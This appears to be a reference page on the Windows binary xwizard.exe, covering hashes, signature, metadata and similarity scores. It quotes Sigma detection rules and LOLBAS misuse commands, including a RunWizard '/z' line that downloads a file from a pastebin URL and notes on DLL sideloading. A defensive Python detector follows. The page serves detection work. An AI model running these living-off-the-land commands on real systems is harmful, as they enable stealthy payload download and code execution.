xwizard.exe

  • File Path: C:\WINDOWS\SysWOW64\xwizard.exe
  • Description: Extensible Wizards Host Process

Hashes

Type Hash
MD5 CB72CA2B130AA4B776FAF32E18453CF6
SHA1 9B7E63B9B203149434F3399C4F50CF4C90156E14
SHA256 E8C5AB5C641D902D7ED9CBEA6434A218728A7D4A07F7C330975C4F66EC7AE453
SHA384 B8EDF55FD8F599028E6968FC28E6487AD9A1BAC9E5453D94A8C3DFC6F236FB89EF56C0299918B9AFC7010966E036338D
SHA512 4B9F433F4208BB68601469081B577862D9400E1F2586ABD83339C61D62D0109C8D620F365F8ABC2B71460795551B3A3C57E2847DC11A43E3A78C7AFB36E61DF0
SSDEEP 1536:iQTiHGLIKWDivTndURDoq4OZZZLlCIib:rTkGsDiLnSRD68wb

Signature

  • Status: Signature verified.
  • Serial: 330000023241FB59996DCC4DFF000000000232
  • Thumbprint: FF82BC38E1DA5E596DF374C53E3617F7EDA36B06
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: xwizard.exe.mui
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.18362.1 (WinBuild.160101.0800)
  • Product Version: 10.0.18362.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

File Similarity (ssdeep match)

File Score
C:\Windows\system32\ComputerDefaults.exe 54
C:\WINDOWS\system32\ComputerDefaults.exe 54
C:\WINDOWS\system32\ComputerDefaults.exe 57
C:\Windows\system32\ComputerDefaults.exe 55
C:\windows\system32\ComputerDefaults.exe 66
C:\Windows\system32\ComputerDefaults.exe 47
C:\Windows\system32\xwizard.exe 52
C:\windows\system32\xwizard.exe 57
C:\Windows\system32\xwizard.exe 47
C:\WINDOWS\system32\xwizard.exe 55
C:\WINDOWS\system32\xwizard.exe 50
C:\Windows\system32\xwizard.exe 54
C:\windows\SysWOW64\ComputerDefaults.exe 60
C:\WINDOWS\SysWOW64\ComputerDefaults.exe 46
C:\Windows\SysWOW64\ComputerDefaults.exe 63
C:\WINDOWS\SysWOW64\ComputerDefaults.exe 41
C:\Windows\SysWOW64\ComputerDefaults.exe 50
C:\Windows\SysWOW64\ComputerDefaults.exe 50
C:\WINDOWS\SysWOW64\xwizard.exe 55
C:\Windows\SysWOW64\xwizard.exe 63
C:\Windows\SysWOW64\xwizard.exe 69
C:\windows\SysWOW64\xwizard.exe 54
C:\Windows\SysWOW64\xwizard.exe 57

Possible Misuse

The following table contains possible examples of xwizard.exe being misused. While xwizard.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma proc_creation_win_class_exec_xwizard.yml title: Custom Class Execution via Xwizard DRL 1.0
sigma proc_creation_win_class_exec_xwizard.yml description: Detects the execution of the Xwizard tool with specific arguments that are used to run custom class properties. DRL 1.0
sigma proc_creation_win_class_exec_xwizard.yml - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ DRL 1.0
sigma proc_creation_win_class_exec_xwizard.yml Image|endswith: '\xwizard.exe' DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml title: Xwizard DLL Sideloading DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml description: Detects the execution of the Xwizard tool from a non-default directory, which can be used to sideload a custom xwizards.dll DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml Image|endswith: '\xwizard.exe' DRL 1.0
LOLBAS Xwizard.yml Name: Xwizard.exe  
LOLBAS Xwizard.yml - Command: xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}  
LOLBAS Xwizard.yml Description: Xwizard.exe running a custom class that has been added to the registry.  
LOLBAS Xwizard.yml - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}  
LOLBAS Xwizard.yml Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switches prevent an error message in later Windows 10 builds.  
LOLBAS Xwizard.yml - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM  
LOLBAS Xwizard.yml Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file.  
LOLBAS Xwizard.yml - Path: C:\Windows\System32\xwizard.exe  
LOLBAS Xwizard.yml - Path: C:\Windows\SysWOW64\xwizard.exe  
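The following is an added example and is not part of this page, the Sigma project or LOLBAS. It reimplements the two Sigma detections listed above as plain Python predicates over process-creation events (simplified from the rules, not the rule files themselves), adds a heuristic of my own for the LOLBAS "/z<url>" download form, and checks a collected binary against the SHA256 recorded in the Hashes section. The event field names (Image, CommandLine), the sample events and the trusted-directory list are assumptions; the sample events are constructed for the example.

```python
import hashlib
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style fields);
# these are made up for the example, not real telemetry.
SAMPLE_EVENTS = [
    {"Image": "C:\\Windows\\System32\\xwizard.exe",
     "CommandLine": "xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}"},
    {"Image": "C:\\Windows\\SysWOW64\\xwizard.exe",
     "CommandLine": "xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}"},
    {"Image": "C:\\Users\\Public\\tools\\xwizard.exe",  # signed binary copied out of System32
     "CommandLine": "xwizard.exe"},
    {"Image": "C:\\Windows\\System32\\xwizard.exe",
     "CommandLine": "xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} "
                    "/zhttps://pastebin.com/raw/iLxUT5gM"},
    {"Image": "C:\\Windows\\System32\\ComputerDefaults.exe",
     "CommandLine": "ComputerDefaults.exe"},
]

# SHA256 of the catalogued build (10.0.18362.1) from the Hashes section of this page.
KNOWN_SHA256 = "e8c5ab5c641d902d7ed9cbea6434a218728a7d4a07f7c330975c4f66ec7ae453"

# Directories the signed binary legitimately lives in (assumed list). Anything else is
# suspicious because xwizard.exe loads xwizards.dll from its own directory.
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# CLSID in braces, as passed to "RunWizard".
GUID_RE = re.compile(
    r"\{[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\}", re.I)


def is_xwizard(event: dict) -> bool:
    """Equivalent of the Sigma selector Image|endswith '\\xwizard.exe' (case-insensitive)."""
    return event.get("Image", "").lower().endswith("\\xwizard.exe")


def custom_class_exec(event: dict) -> bool:
    """Simplified proc_creation_win_class_exec_xwizard: xwizard.exe, RunWizard and a CLSID."""
    if not is_xwizard(event):
        return False
    cmd = event.get("CommandLine", "")
    return "runwizard" in cmd.lower() and GUID_RE.search(cmd) is not None


def dll_sideload_path(event: dict) -> bool:
    """Simplified proc_creation_win_dll_sideload_xwizard: xwizard.exe outside the trusted dirs."""
    if not is_xwizard(event):
        return False
    return not event["Image"].lower().startswith(TRUSTED_DIRS)


def remote_wizard_download(event: dict) -> bool:
    """Extra heuristic (not one of the Sigma rules): the LOLBAS '/z<url>' download form."""
    if not custom_class_exec(event):
        return False
    return re.search(r"/z\s*https?://", event["CommandLine"], re.I) is not None


CHECKS = [
    ("custom_class_exec", custom_class_exec),
    ("dll_sideload_path", dll_sideload_path),
    ("remote_wizard_download", remote_wizard_download),
]


def triage(events):
    """Return (Image, [names of matching checks]) for every event that trips at least one check."""
    hits = []
    for event in events:
        tags = [name for name, check in CHECKS if check(event)]
        if tags:
            hits.append((event["Image"], tags))
    return hits


def matches_catalogued_build(data: bytes) -> bool:
    """True if a collected file's SHA256 equals the hash recorded above for build 10.0.18362.1.
    A mismatch alone is not proof of tampering: other Windows builds ship a different xwizard.exe."""
    return hashlib.sha256(data).hexdigest() == KNOWN_SHA256


if __name__ == "__main__":
    for image, tags in triage(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(tags)}")
    print(matches_catalogued_build(b"not the real binary"))
```

Two points worth keeping in mind when using checks like these: the sideloading case is caught by the image path, not by the Authenticode signature, because a copy of the Microsoft-signed xwizard.exe placed in a writable directory still verifies cleanly while loading whatever xwizards.dll sits beside it; and the "/z<url>" form trips the custom-class check as well, since it is still RunWizard with a CLSID, so the extra heuristic only adds a more specific label rather than new coverage.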

MIT License. Copyright (c) 2020-2021 Strontic.